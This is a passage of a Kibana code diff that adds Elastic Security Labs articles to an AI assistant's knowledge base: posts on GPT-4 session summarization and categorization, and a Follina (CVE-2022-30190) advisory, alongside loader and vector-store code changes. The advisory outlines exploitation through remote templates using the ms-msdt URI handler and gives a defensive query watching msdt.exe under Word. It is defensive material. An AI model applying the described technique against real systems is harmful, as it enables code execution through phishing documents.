+In our [previous article](https://www.elastic.co/security-labs/using-llms-to-summarize-user-sessions), we explored using the GPT-4 Large Language Model (LLM) to condense complex Linux user sessions into concise summaries. We highlighted the key takeaways from our experiments, shedding light on the nuances of data preprocessing, prompt tuning, and model parameter adjustments. In the context of the same experiment, we dedicated some time to examine sessions that shared similarities. These similar sessions can subsequently aid the analysts in identifying related suspicious activities. We explored the following methods to find similarities in user sessions:
+
+ - In an endeavor to uncover similar user profiles and sessions, one approach we undertook was to categorize sessions according to the actions executed by users; we accomplished this by instructing the Language Model Model (LLM) to categorize user sessions into predefined categories
+ - Additionally, we harnessed the capabilities of [ELSER](https://www.elastic.co/guide/en/machine-learning/current/ml-nlp-elser.html) (Elastic’s retrieval model for semantic search) to execute a semantic search on the model summaries derived from the session summarization experiment
+
+This research focuses on our experiments using GPT-4 for session categorization and [ESRE](https://www.elastic.co/elasticsearch/elasticsearch-relevance-engine) for semantic search.
+
+## Leveraging GPT for Session Categorization
+
+We consulted a security research colleague with domain expertise to define nine categories for our dataset of 75 sessions. These categories generalize the main behaviors and significant features observed in the sessions. They include the following activities:
+
+* Docker Execution
+* Network Operations
+* File Searches
+* Linux Command Line Usage
+* Linux Sandbox Application Usage
+* Pip Installations
+* Package Installations
+* Script Executions
+* Process Executions
+
+## Lessons learned
+
+For our experiments, we used a GPT-4 deployment in Azure AI Studio with a token limit of 32k. To explore the potential of the GPT model for session categorization, we conducted a series of experiments, directing the model to categorize sessions by inputting the same JSON summary document we used for the [session summarization process](https://www.elastic.co/security-labs/using-llms-to-summarize-user-sessions). 
+
+This effort included multiple iterations, during which we concentrated on enhancing prompts and [Few-Shot](https://help.openai.com/en/articles/6654000-best-practices-for-prompt-engineering-with-openai-api) Learning. As for the model parameters, we maintained a [Temperature of 0](https://txt.cohere.com/llm-parameters-best-outputs-language-ai/) in an effort to make the outputs less diverse.
+
+### Prompt engineering
+*Takeaway:* Including explanations for categories in the prompts does not impact the model's performance.
+
+The session categorization component was introduced as an extension to the session summarization prompt. We explored the effect of incorporating contextual explanations for each category alongside the prompts. Intriguingly, our findings revealed that appending illustrative context did not significantly influence the model's performance, as compared to prompts devoid of such supplementary information.
+
+Below is a template we used to guide the model's categorization process:
+
+```
+You are a cybersecurity assistant, who helps Security analysts in summarizing activities that transpired in a Linux session. A summary of events that occurred in the session will be provided in JSON format. No need to explicitly list out process names and file paths. Summarize the session in ~3 paragraphs, focusing on the following: 
+- Entities involved in the session: host name and user names.
+- Overview of any network activity. What major source and destination ips are involved? Any malicious port activity?
+- Overview of any file activity. Were any sensitive files or directories accessed?
+- Highlight any other important process activity
+- Looking at the process, network, and file activity, what is the user trying to do in the session? Does the activity indicate malicious behavior?
+
+Also, categorize the below Linux session in one of the following 9 categories: Network, Script Execution, Linux Command Line Utility, File search, Docker Execution, Package Installations, Pip Installations, Process Execution and Linux Sandbox Application.
+
+A brief description for each Linux session category is provided below. Refer to these explanations while categorizing the sessions.
+- Docker Execution: The session involves command with docker operations, such as docker-run and others
+- Network: The session involves commands with network operations
+- File Search: The session involves file operations, pertaining to search
+- Linux Command Line Utility: The session involves linux command executions
+- Linux Sandbox Application: The session involves a sandbox application activity. 
+- Pip Installations: The session involves python pip installations
+- Package Installations: The session involves package installations or removal activities. This is more of apt-get, yum, dpkg and general command line installers as opposed to any software wrapper
+- Script Execution: The session involves bash script invocations. All of these have pointed custom infrastructure script invocations
+- Process Execution: The session focuses on other process executions and is not limited to linux commands. 
+ ###
+ Text: {your input here}
+```
+
+### Few-shot tuning
+*Takeaway:* Adding examples for each category improves accuracy.
+
+Simultaneously, we investigated the effectiveness of improving the model's performance by including one example for each category in the above prompt. This strategy resulted in a significant enhancement, notably boosting the model's accuracy by 20%.
+
+## Evaluating GPT Categories
+
+The assessment of GPT categories is crucial in measuring the quality and reliability of the outcomes. In the evaluation of categorization results, a comparison was drawn between the model's categorization and the human categorization assigned by the security expert (referred to as "Ground_Truth" in the below image). We calculated the total accuracy based on the number of successful matches for categorization evaluation.
+
+![Evaluating Session Categories](/assets/images/using-llms-and-esre-to-find-similar-user-sessions/image2.png)
+
+We observed that GPT-4 faced challenges when dealing with samples bearing multiple categories. However, when assigning a single category, it aligned with the human categorization in 56% of cases. The "Linux Command Line Utility" category posed a particular challenge, with 47% of the false negatives, often misclassified as "Process Execution" or "Script Execution." This discrepancy arose due to the closely related definitions of the "Linux Command Line Utility" and "Process Execution" categories and there may have also been insufficient information in the prompts, such as process command line arguments, which could have served as a valuable distinguishing factor for these categories.
+
+Given the results from our evaluation, we conclude that we either need to tune the descriptions for each category in the prompt or provide more examples to the model via few-shot training. Additionally, it's worth considering whether GPT is the most suitable choice for classification, particularly within the context of the prompting paradigm.
+
+## Semantic search with ELSER
+
+We also wanted to try [ELSER](https://www.elastic.co/guide/en/machine-learning/current/ml-nlp-elser.html#ml-nlp-elser), the Elastic Learned Sparse EncodeR for semantic search. Semantic search focuses on contextual meaning, rather than strictly exact keyword inputs, and ELSER is a retrieval model trained by Elastic that enables you to perform semantic search and retrieve more relevant results.
+
+We tried some examples of semantic search questions on the session summaries. The session summaries were stored in an Elasticsearch index, and it was simple to download the ELSER model following an [official tutorial](https://www.elastic.co/guide/en/machine-learning/current/ml-nlp-elser.html#ml-nlp-elser). The tokens generated by ELSER are stored in the index, as shown in the image below:
+
+![Tokens generated by ELSER](/assets/images/using-llms-and-esre-to-find-similar-user-sessions/image1.png)
+
+Afterward, semantic search on the index was overall able to retrieve the most relevant events. Semantic search queries about the events included:
+
+ - Password related – yielding 1Password related logs
+ - Java – yielding logs that used Java
+ - Python – yielding logs that used Python
+ - Non-interactive session
+ - Interactive session
+
+An example of semantic search can be seen in the Dev Tools console through a [text_expansion query](https://www.elastic.co/guide/en/elasticsearch/reference/8.9/semantic-search-elser.html#text-expansion-query).
+
+![Example screenshot of using semantic search with the Elastic dev tools console](/assets/images/using-llms-and-esre-to-find-similar-user-sessions/image5.png)
+
+Some takeaways are: 
+
+* For semantic search, the prompt template can cause the summary to have too many unrelated keywords. For example, we wanted every summary to include an assessment of whether or not the session should be considered "malicious", that specific word was always included in the resulting summary. Hence, the summaries of benign sessions and malicious sessions alike contained the word "malicious" through sentences like "This session is malicious" or "This session is not malicious". This could have impacted the accuracy.
+* Semantic search seemed unable to differentiate effectively between certain related concepts, such as interactive vs. non-interactive. A small number of specific terms might not have been deemed important enough to the core meaning of the session summary for semantic search.
+* Semantic search works better than [BM25](https://link.springer.com/referenceworkentry/10.1007/978-0-387-39940-9_921) for cases where the user doesn’t specify the exact keywords. For example, searching for "Python" or "Java" related logs and summaries is equally effective with both ELSER and BM25. However, ELSER could retrieve more relevant data when searching for “object oriented language” related logs. In contrast, using a keyword search for “object oriented language” doesn’t yield relevant results, as shown in the image below.
+
+![Semantic search can yield more relevant results when keywords aren’t matching](/assets/images/using-llms-and-esre-to-find-similar-user-sessions/image4.png)
+
+## What's next
+We are currently looking into further improving summarization via [retrieval augmented generation (RAG)](https://arxiv.org/pdf/2005.11401.pdf), using tools in the [Elastic Search and Relevance Engine](https://www.elastic.co/guide/en/esre/current/index.html) (ESRE). In the meantime, we’d love to hear about your experiments with LLMs, ESRE, etc. If you'd like to share what you're doing or run into any issues during the process, please reach out to us on our [community Slack channel](https://ela.st/slack) and [discussion forums](https://discuss.elastic.co/c/security). 
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/using_llms_to_summarize_user_sessions.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/using_llms_to_summarize_user_sessions.md
new file mode 100644
index 0000000000000..dd7ee19603a32
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/using_llms_to_summarize_user_sessions.md
@@ -0,0 +1,122 @@
+---
+title: "Using LLMs to summarize user sessions"
+slug: "using-llms-to-summarize-user-sessions"
+date: "2023-09-11"
+description: "In this publication, we will talk about lessons learned and key takeaways from our experiments using GPT-4 to summarize user sessions."
+author:
+  - slug: apoorva-joshi
+  - slug: kirti-sodhi
+  - slug: susan-chang
+image: "photo-edited-01@2x.jpg"
+category:
+  - slug: detection-science
+  - slug: machine-learning
+  - slug: generative-ai
+---
+
+## Using LLMs to summarize user sessions
+With the introduction of the [AI Assistant](https://www.elastic.co/guide/en/security/current/security-assistant.html) into the Security Solution in 8.8, the Security Machine Learning team at Elastic has been exploring how to optimize Security operations with LLMs like GPT-4. User session summarization seemed like the perfect use case to start experimenting with for several reasons:
+ - User session summaries can help analysts quickly decide whether a particular session's activity is worth investigating or not
+ - Given the diversity of data that LLMs like GPT-4 are trained on, it is not hard to imagine that they have already been trained on [man pages](https://en.wikipedia.org/wiki/Man_page), and other open Security content, which can provide useful context for session investigation
+ - Session summaries could potentially serve as a good supplement to the [Session View](https://www.elastic.co/guide/en/security/current/session-view.html) tool, which is available in the Elastic Security Solution as of 8.2.
+
+In this publication, we will talk about lessons learned and key takeaways from our experiments using GPT-4 to summarize user sessions.
+
+In our [follow-on research](https://www.elastic.co/security-labs/using-llms-and-esre-to-find-similar-user-sessions), we dedicated some time to examine sessions that shared similarities. These similar sessions can subsequently aid the analysts in identifying related suspicious activities.
+
+## What is a session?
+In Linux, and other Unix-like systems, a "user session" refers to the period during which a user is logged into the system. A session begins when a user logs into the system, either via graphical login managers (GDM, LightDM) or via command-line interfaces (terminal, SSH). 
+
+Upon starting a Linux Kernel, a special process called the "init' process is created, which is responsible for starting configured services such as databases, web servers, and remote access services such as `sshd`. These services, and any shells or processes spawned by them, are typically encapsulated within their own sessions and tied together by a single session ID (SID).
+
+The detailed and chronological process information captured by sessions makes them an extremely useful asset for alerting, compliance, and threat hunting.
+
+## Lessons learned
+For our experiments, we used a GPT-4 deployment with a 32k token limit available via Azure AI Studio. Tokens are basic units of text or code that LLMs use to process and generate language. Our goal here was to see how far we can get with user session summarization within the prompting paradigm alone. We learned some things along the way as it related to data processing, prompt engineering, hallucinations, parameter tuning, and evaluating the GPT summaries.
+
+### Data processing
+*Takeaway:* An aggregated JSON snapshot of the session is an effective input format for summarization.
+
+A session here is simply a collection of process, network, file, and alert events. The number of events in a user session can range from a handful (< 10) to hundreds of thousands. Each event log itself can be quite verbose, containing several hundred fields. For longer sessions with a large number of events, one can quickly run into token limits for models like GPT-4. Hence, passing raw logs as input to GPT-4 is not as useful for our specific use case. We saw this during experimentation, even when using tabular formats such as CSV, and using a small subset of fields in the logs. 
+
+![Max token limit (32k) is reached for sessions containing a few hundred events](/assets/images/using-llms-to-summarize-user-sessions/image1.png)
+
+To get around this issue, we had to come up with an input format that retains as much of the session's context as possible, while also keeping the number of input tokens more or less constant irrespective of the length of the session. We experimented with several log de-duplication and aggregation strategies and found that an aggregated JSON snapshot of the session works well for summarization. An example document is as follows:
+
+![Aggregated JSON snapshot of session activity](/assets/images/using-llms-to-summarize-user-sessions/image3.jpg)
+
+This JSON snapshot highlights the most prominent activities in the session using de-duplicated lists, aggregate counts, and top-N (20 in our case) most frequent terms, with self-explanatory field names. 
+
+### Prompt engineering
+*Takeaway:* Few-shot tuning with high-level instructions worked best.
+
+Apart from data processing, most of our time during experimentation was spent on prompt tuning. We started with a basic prompt and found that the model had a hard time connecting the dots to produce a useful summary:
+
+```
+You are an AI assistant that helps people find information.
+```
+
+We then tried providing very detailed instructions in the prompt but noticed that the model ignored some of the instructions:
+
+```
+You are a cybersecurity assistant, who helps Security analysts in summarizing activities that transpired in a Linux session. A summary of events that occurred in the session will be provided in JSON format. No need to explicitly list out process names and file paths. Summarize the session in ~3 paragraphs, focusing on the following: 
+- Entities involved in the session: host name and user names.
+- Overview of any network activity. What major source and destination ips are involved? Any malicious port activity?
+- Overview of any file activity. Were any sensitive files or directories accessed?
+- Highlight any other important process activity
+- Looking at the process, network, and file activity, what is the user trying to do in the session? Does the activity indicate malicious behavior?
+```
+
+Based on the above prompt, the model did not reliably adhere to the 3 paragraph request and also listed out process names and file paths which it was explicitly told not to do. 
+
+Finally, we landed on the following prompt that provided high-level instructions for the model:
+
+```
+Analyze the following Linux user session, focusing on:      
+- Identifying the host and user names      
+- Observing activities and identifying key patterns or trends      
+- Noting any indications of malicious or suspicious behavior such as tunneling or encrypted traffic, login failures, access to sensitive files, large number of file creations and deletions, disabling or modifying Security software, use of Shadow IT, unusual parent-child process executions, long-running processes
+- Conclude with a comprehensive summary of what the user might be trying to do in the session, based on the process, network, and file activity     
+ ###
+ Text: {your input here}
+```
+
+We also noticed that the model follows instructions more closely when they're provided in user prompts rather than in the system prompts (a system prompt is the initial instruction to the model telling it how it should behave and the user prompts are the questions/queries asked by a user to the model). After the above prompt, we were happy with the content of the summaries, but the output format was inconsistent, with the model switching between paragraphs and bulleted lists. We were able to resolve this with [few-shot tuning](https://arxiv.org/pdf/2203.04291.pdf), by providing the model with two examples of user prompts vs. expected responses. 
+
+### Hallucinations
+*Takeaway:* The model occasionally hallucinates while generating net new content for the summaries.
+
+We observed that the model does not typically [hallucinate](https://arxiv.org/pdf/2110.10819.pdf) while summarizing facts that are immediately apparent in the input such as user and host entities, network ports, etc. Occasionally, the model hallucinates while summarizing information that is not obvious, for example, in this case summarizing the overall user intent in the session. Some relatively easy avenues we found to mitigate hallucinations were as follows:
+ - Prompt the model to focus on specific behaviors while summarizing
+ - Re-iterate that the model should fact-check its output
+ - Set the [temperature](https://learnprompting.org/docs/basics/configuration_hyperparameters) to a low value (less than or equal to 0.2) to get the model to generate less diverse responses, hence reducing the chances of hallucinations
+ - Limit the response length, thus reducing the opportunity for the model to go off-track — This works especially  well if the length of the texts to be summarized is more or less constant, which it was in our case
+
+### Parameter tuning
+*Takeaway:* Temperature = 0 does not guarantee determinism.
+
+For summarization, we explored tuning parameters such as [Temperature and Top P](https://txt.cohere.com/llm-parameters-best-outputs-language-ai/), to get deterministic responses from the model. Our observations were as follows:
+ - Tuning both together is not recommended, and it's also difficult to observe the effect of each when combined
+ - Solely setting the temperature to a low value (< 0.2) without altering Top P is usually sufficient
+ - Even setting the temperature to 0 does not result in fully deterministic outputs given the inherent non-deterministic nature of floating point calculations (see [this](https://community.openai.com/t/a-question-on-determinism/8185) post from OpenAI for a more detailed explanation)              
+
+## Evaluating GPT Summaries
+As with any modeling task, evaluating the GPT summaries was crucial in gauging the quality and reliability of the model outcomes. In the absence of standardized evaluation approaches and metrics for text generation, we decided to do a qualitative human evaluation of the summaries, as well as a quantitative evaluation using automatic metrics such as [ROUGE-L](https://en.wikipedia.org/wiki/ROUGE_(metric)), [BLEU](https://en.wikipedia.org/wiki/BLEU), [METEOR](https://en.wikipedia.org/wiki/METEOR), [BERTScore](https://arxiv.org/abs/1904.09675), and [BLANC](https://aclanthology.org/2020.eval4nlp-1.2/). 
+
+For qualitative evaluation, we had a Security Researcher write summaries for a carefully chosen (to get a good distribution of short and long sessions) set of 10 sessions, without any knowledge of the GPT summaries. Three evaluators were asked to compare the GPT summaries against the human-generated summaries using three key criteria: 
+ - Factuality:  Examine if the model summary retains key facts of the session as provided by Security experts
+ - Authenticity: Check for hallucinations
+ - Consistency: Check the consistency of the model output i.e. all the responses share a stable format and produce the same level of detail
+
+Finally, each of the 10 summaries was assigned a final rating of "Good" or "Bad" based on a majority vote to combine the evaluators' choices.
+
+![Summarization evaluation matrix](/assets/images/using-llms-to-summarize-user-sessions/image2.png)
+
+While we recognize the small dataset size for evaluation, our qualitative assessment showed that GPT summaries aligned with human summaries 80% of the time. For the GPT summaries that received a "Bad" rating, the summaries didn't retain certain important facts because the aggregated JSON document only kept the top-N terms for certain fields. 
+
+The automated metrics didn't seem to match human preferences, nor did they reliably measure summary quality due to the structural differences between human and LLM-generated summaries, especially for reference-based metrics.
+
+## What's next
+We are currently looking into further improving summarization via [retrieval augmented generation (RAG)](https://arxiv.org/pdf/2005.11401.pdf), using tools in the [Elastic Search and Relevance Engine (ESRE)](https://www.elastic.co/guide/en/esre/current/index.html). We also experimented with using LLMs to categorize user sessions. Stay tuned for Part 2 of this blog to learn more about those experiments!
+
+In the meantime, we’d love to hear about your experiments with LLMs, ESRE, etc. If you'd like to share what you're doing or run into any issues during the process, please reach out to us on our [community Slack channel](https://ela.st/slack) and [discussion forums](https://discuss.elastic.co/c/security). Happy experimenting!
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/vulnerability_summary_follina.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/vulnerability_summary_follina.md
new file mode 100644
index 0000000000000..3b894b182c6c3
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/vulnerability_summary_follina.md
@@ -0,0 +1,37 @@
+---
+title: "Vulnerability summary: Follina, CVE-2022-30190"
+slug: "vulnerability-summary-follina"
+date: "2023-01-19"
+description: "Elastic is deploying a new malware signature to identify the use of the Follina vulnerability. Learn more in this post."
+author:
+  - slug: devon-kerr
+image: "blog-security-detection-720x420.png"
+category:
+  - slug: security-research
+  - slug: vulnerability-updates
+---
+
+On May 27, 2022, the nao_sec independent security research group shared a VirusTotal link to a weaponized Microsoft Office document revealing a previously unknown vulnerability in the Microsoft Support Diagnostic Tool (MSDT). This vulnerability is most likely to be exploited via phishing lure attachments and is triggered when a document is opened. Readers should expect this vulnerability to be adopted by threats of all kinds and be aware that it enables arbitrary code to be executed as outlined in Microsoft’s [<u>disclosure</u>](https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/).
+
+## Summary
+
+Readers may [<u>recall</u>](https://www.elastic.co/blog/playing-defense-against-gamaredon-group) that template injection is an [<u>established</u>](https://attack.mitre.org/techniques/T1221/) technique enabling an attacker to remotely load malicious content when a document is opened by a relevant application. This vulnerability — dubbed “[<u>Follina</u>](https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e)” — works in conjunction with template injection, specifically when the remote template uses the ms-msdt URI handler. Importantly, it does not require macros to be enabled. As in other cases of template injection, readers should be aware that remote objects may be heavily obfuscated.
+
+Security teams should monitor msdt.exe as a child process of WINWORD.exe and other applications, paying particular attention to command line arguments and network activity attributed to that child process. Security teams may also consider monitoring network activity from all MS Office applications and their descendants as one way of generically identifying initial exploitation attempts via weaponized documents.
+
+Elastic is deploying a new malware signature to identify the use of ms-msdt URIs. This signature will be distributed via the Elastic Endpoint. The team has also issued an update to the “[<u>Suspicious MS Office Child Process</u>](https://github.com/elastic/detection-rules/blob/main/rules/windows/initial_access_suspicious_ms_office_child_process.toml)” rule available via the [<u>detection-rules repository</u>](https://github.com/elastic/detection-rules), adding “msdt.exe” to the list of suspicious descendants and “Outlook.exe” to the list of relevant parent processes. The following query pertains to Elastic Endgame:
+
+```
+Network where process_name == “msdt.exe” and
+descendant of  [process where process_name == “winword.exe” ]
+| unique process_name, command_line
+```
+
+## References
+
+Several organizations have released information and resources related to this vulnerability (non-exhaustive):
+
+- Microsoft’s [<u>guidance</u>](https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/), outlining one method of disabling the MSDT URL protocol
+- Huntress has provided their [<u>analysis</u>](https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug) of the vulnerability with additional information about ms-msdt abuse Todyl has shared an [<u>Elastic query </u>](https://twitter.com/brent_murphy/status/1531322468228399104?t=yX_zDYE4ew6gA4am6a75Ug&s=09)pertaining to process events
+
+Kevin Beaumont has provided a [<u>write-up</u>](https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e) with historical and other details about potential implementations.
diff --git a/x-pack/plugins/elastic_assistant/server/lib/langchain/content_loaders/add_required_kb_resource_metadata.test.ts b/x-pack/plugins/elastic_assistant/server/lib/langchain/content_loaders/add_required_kb_resource_metadata.test.ts
index 17938cbd4eb48..c66c18cd434ad 100644
--- a/x-pack/plugins/elastic_assistant/server/lib/langchain/content_loaders/add_required_kb_resource_metadata.test.ts
+++ b/x-pack/plugins/elastic_assistant/server/lib/langchain/content_loaders/add_required_kb_resource_metadata.test.ts
@@ -17,6 +17,7 @@ describe('addRequiredKbResourceMetadata', () => {
     const transformedDocs = addRequiredKbResourceMetadata({
       docs: mockExampleQueryDocsFromDirectoryLoader,
       kbResource,
+      required: true,
     });
 
     transformedDocs.forEach((doc, i) => {
@@ -31,6 +32,7 @@ describe('addRequiredKbResourceMetadata', () => {
     const transformedDocs = addRequiredKbResourceMetadata({
       docs: mockExampleQueryDocsFromDirectoryLoader,
       kbResource,
+      required: true,
     });
 
     transformedDocs.forEach((doc) => {
@@ -42,6 +44,7 @@ describe('addRequiredKbResourceMetadata', () => {
     const transformedDocs = addRequiredKbResourceMetadata({
       docs: mockExampleQueryDocsFromDirectoryLoader,
       kbResource,
+      required: true,
     });
 
     transformedDocs.forEach((doc) => {
diff --git a/x-pack/plugins/elastic_assistant/server/lib/langchain/content_loaders/esql_loader.test.ts b/x-pack/plugins/elastic_assistant/server/lib/langchain/content_loaders/esql_loader.test.ts
index 718f80b16972f..9c1c5976fd550 100644
--- a/x-pack/plugins/elastic_assistant/server/lib/langchain/content_loaders/esql_loader.test.ts
+++ b/x-pack/plugins/elastic_assistant/server/lib/langchain/content_loaders/esql_loader.test.ts
@@ -70,6 +70,7 @@ describe('loadESQL', () => {
           ...addRequiredKbResourceMetadata({
             docs: mockExampleQueryDocsFromDirectoryLoader,
             kbResource: ESQL_RESOURCE,
+            required: true,
           }),
         ],
         global: true,
diff --git a/x-pack/plugins/elastic_assistant/server/lib/langchain/content_loaders/security_labs_loader.ts b/x-pack/plugins/elastic_assistant/server/lib/langchain/content_loaders/security_labs_loader.ts
new file mode 100644
index 0000000000000..10566b3e5a1d5
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/lib/langchain/content_loaders/security_labs_loader.ts
@@ -0,0 +1,57 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+import { Logger } from '@kbn/core/server';
+import { DirectoryLoader } from 'langchain/document_loaders/fs/directory';
+import { TextLoader } from 'langchain/document_loaders/fs/text';
+import { resolve } from 'path';
+import { Document } from 'langchain/document';
+import { Metadata } from '@kbn/elastic-assistant-common';
+
+import { addRequiredKbResourceMetadata } from './add_required_kb_resource_metadata';
+import { SECURITY_LABS_RESOURCE } from '../../../routes/knowledge_base/constants';
+import { AIAssistantKnowledgeBaseDataClient } from '../../../ai_assistant_data_clients/knowledge_base';
+
+/**
+ * Loads the Elastic Security Labs mdx files into the Knowledge Base.
+ */
+export const loadSecurityLabs = async (
+  kbDataClient: AIAssistantKnowledgeBaseDataClient,
+  logger: Logger
+): Promise<boolean> => {
+  try {
+    const docsLoader = new DirectoryLoader(
+      resolve(__dirname, '../../../knowledge_base/security_labs'),
+      {
+        '.md': (path) => new TextLoader(path),
+      },
+      true
+    );
+
+    const rawDocs = await docsLoader.load();
+    // Add additional metadata to set kbResource as esql
+    const docs = addRequiredKbResourceMetadata({
+      docs: rawDocs,
+      kbResource: SECURITY_LABS_RESOURCE,
+      required: false,
+    }) as Array<Document<Metadata>>;
+
+    logger.info(`Loading ${docs.length} Security Labs docs into the Knowledge Base`);
+
+    const response = await kbDataClient.addKnowledgeBaseDocuments({
+      documents: docs,
+      global: true,
+    });
+
+    logger.info(`Loaded ${response?.length ?? 0} Security Labs docs into the Knowledge Base`);
+
+    return response.length > 0;
+  } catch (e) {
+    logger.error(`Failed to load Security Labs docs into the Knowledge Base\n${e}`);
+    return false;
+  }
+};
diff --git a/x-pack/plugins/elastic_assistant/server/lib/langchain/elasticsearch_store/elasticsearch_store.ts b/x-pack/plugins/elastic_assistant/server/lib/langchain/elasticsearch_store/elasticsearch_store.ts
index 24cec841a443f..48ea50d9d4fe8 100644
--- a/x-pack/plugins/elastic_assistant/server/lib/langchain/elasticsearch_store/elasticsearch_store.ts
+++ b/x-pack/plugins/elastic_assistant/server/lib/langchain/elasticsearch_store/elasticsearch_store.ts
@@ -72,7 +72,7 @@ export class ElasticsearchStore extends VectorStore {
   private readonly logger: Logger;
   private readonly telemetry: AnalyticsServiceSetup;
   private readonly model: string;
-  private readonly kbResource: string;
+  private kbResource: string;
 
   _vectorstoreType(): string {
     return 'elasticsearch';
@@ -97,6 +97,10 @@ export class ElasticsearchStore extends VectorStore {
     this.kbDataClient = kbDataClient;
   }
 
+  setKbResource(kbResource: string) {
+    this.kbResource = kbResource;
+  }
+
   /**
    * Add documents to the store. Embeddings are created on ingest into index configured with
    * ELSER ingest pipeline. Returns a list of document IDs.
@@ -212,6 +216,7 @@ export class ElasticsearchStore extends VectorStore {
    * @param k Number of similar documents to return
    * @param filter Optional filter to apply to the search
    * @param _callbacks Optional callbacks
+   * @param filterRequiredDocs Optional whether or not to exclude the required docs filter
    *
    * Fun facts:
    * - This function is called by LangChain's `VectorStoreRetriever._getRelevantDocuments`
@@ -222,10 +227,11 @@ export class ElasticsearchStore extends VectorStore {
     query: string,
     k?: number,
     filter?: this['FilterType'] | undefined,
-    _callbacks?: Callbacks | undefined
+    _callbacks?: Callbacks | undefined,
+    filterRequiredDocs = true
   ): Promise<Document[]> => {
     // requiredDocs is an array of filters that can be used in a `bool` Elasticsearch DSL query to filter in/out required KB documents:
-    const requiredDocs = getRequiredKbDocsTermsQueryDsl(this.kbResource);
+    const requiredDocs = filterRequiredDocs ? getRequiredKbDocsTermsQueryDsl(this.kbResource) : [];
 
     // The `k` parameter is typically provided by LangChain's `VectorStoreRetriever._getRelevantDocuments`, which calls this function:
     const vectorSearchQuerySize = k ?? FALLBACK_SIMILARITY_SEARCH_SIZE;
diff --git a/x-pack/plugins/elastic_assistant/server/lib/langchain/execute_custom_llm_chain/index.ts b/x-pack/plugins/elastic_assistant/server/lib/langchain/execute_custom_llm_chain/index.ts
deleted file mode 100644
index 0af5f0453ec8b..0000000000000
--- a/x-pack/plugins/elastic_assistant/server/lib/langchain/execute_custom_llm_chain/index.ts
+++ /dev/null
@@ -1,308 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0; you may not use this file except in compliance with the Elastic License
- * 2.0.
- */
-import agent, { Span } from 'elastic-apm-node';
-import {
-  initializeAgentExecutorWithOptions,
-  createToolCallingAgent,
-  AgentExecutor as lcAgentExecutor,
-} from 'langchain/agents';
-
-import { BufferMemory, ChatMessageHistory } from 'langchain/memory';
-import { ToolInterface } from '@langchain/core/tools';
-import { streamFactory } from '@kbn/ml-response-stream/server';
-import { transformError } from '@kbn/securitysolution-es-utils';
-import { RetrievalQAChain } from 'langchain/chains';
-import { getDefaultArguments } from '@kbn/langchain/server';
-import { ChatPromptTemplate, MessagesPlaceholder } from '@langchain/core/prompts';
-import { APMTracer } from '@kbn/langchain/server/tracers/apm';
-import { withAssistantSpan } from '../tracers/apm/with_assistant_span';
-import { getLlmClass } from '../../../routes/utils';
-import { EsAnonymizationFieldsSchema } from '../../../ai_assistant_data_clients/anonymization_fields/types';
-import { transformESSearchToAnonymizationFields } from '../../../ai_assistant_data_clients/anonymization_fields/helpers';
-import { AgentExecutor } from '../executors/types';
-import { AssistantToolParams } from '../../../types';
-export const DEFAULT_AGENT_EXECUTOR_ID = 'Elastic AI Assistant Agent Executor';
-
-/**
- * The default agent executor used by the Elastic AI Assistant. Main agent/chain that wraps the ActionsClientSimpleChatModel,
- * sets up a conversation BufferMemory from chat history, and registers tools like the ESQLKnowledgeBaseTool.
- *
- */
-export const callAgentExecutor: AgentExecutor<true | false> = async ({
-  abortSignal,
-  actionsClient,
-  alertsIndexPattern,
-  assistantTools = [],
-  bedrockChatEnabled,
-  connectorId,
-  esClient,
-  esStore,
-  langChainMessages,
-  llmType,
-  logger,
-  isStream = false,
-  onLlmResponse,
-  onNewReplacements,
-  replacements,
-  request,
-  size,
-  traceOptions,
-  dataClients,
-  conversationId,
-}) => {
-  const isOpenAI = llmType === 'openai';
-  const llmClass = getLlmClass(llmType, bedrockChatEnabled);
-
-  /**
-   * Creates a new instance of llmClass.
-   *
-   * This function ensures that a new llmClass instance is created every time it is called.
-   * This is necessary to avoid any potential side effects from shared state. By always
-   * creating a new instance, we prevent other uses of llm from binding and changing
-   * the state unintentionally. For this reason, never assign this value to a variable (ex const llm = createLlmInstance())
-   */
-  const createLlmInstance = () =>
-    new llmClass({
-      actionsClient,
-      connectorId,
-      llmType,
-      logger,
-      // possible client model override,
-      // let this be undefined otherwise so the connector handles the model
-      model: request.body.model,
-      // ensure this is defined because we default to it in the language_models
-      // This is where the LangSmith logs (Metadata > Invocation Params) are set
-      temperature: getDefaultArguments(llmType).temperature,
-      signal: abortSignal,
-      streaming: isStream,
-      // prevents the agent from retrying on failure
-      // failure could be due to bad connector, we should deliver that result to the client asap
-      maxRetries: 0,
-    });
-
-  const anonymizationFieldsRes =
-    await dataClients?.anonymizationFieldsDataClient?.findDocuments<EsAnonymizationFieldsSchema>({
-      perPage: 1000,
-      page: 1,
-    });
-
-  const anonymizationFields = anonymizationFieldsRes
-    ? transformESSearchToAnonymizationFields(anonymizationFieldsRes.data)
-    : undefined;
-
-  const pastMessages = langChainMessages.slice(0, -1); // all but the last message
-  const latestMessage = langChainMessages.slice(-1); // the last message
-
-  const memory = new BufferMemory({
-    chatHistory: new ChatMessageHistory(pastMessages),
-    memoryKey: 'chat_history', // this is the key expected by https://github.com/langchain-ai/langchainjs/blob/a13a8969345b0f149c1ca4a120d63508b06c52a5/langchain/src/agents/initialize.ts#L166
-    inputKey: 'input',
-    outputKey: 'output',
-    returnMessages: true,
-  });
-
-  const modelExists = await esStore.isModelInstalled();
-
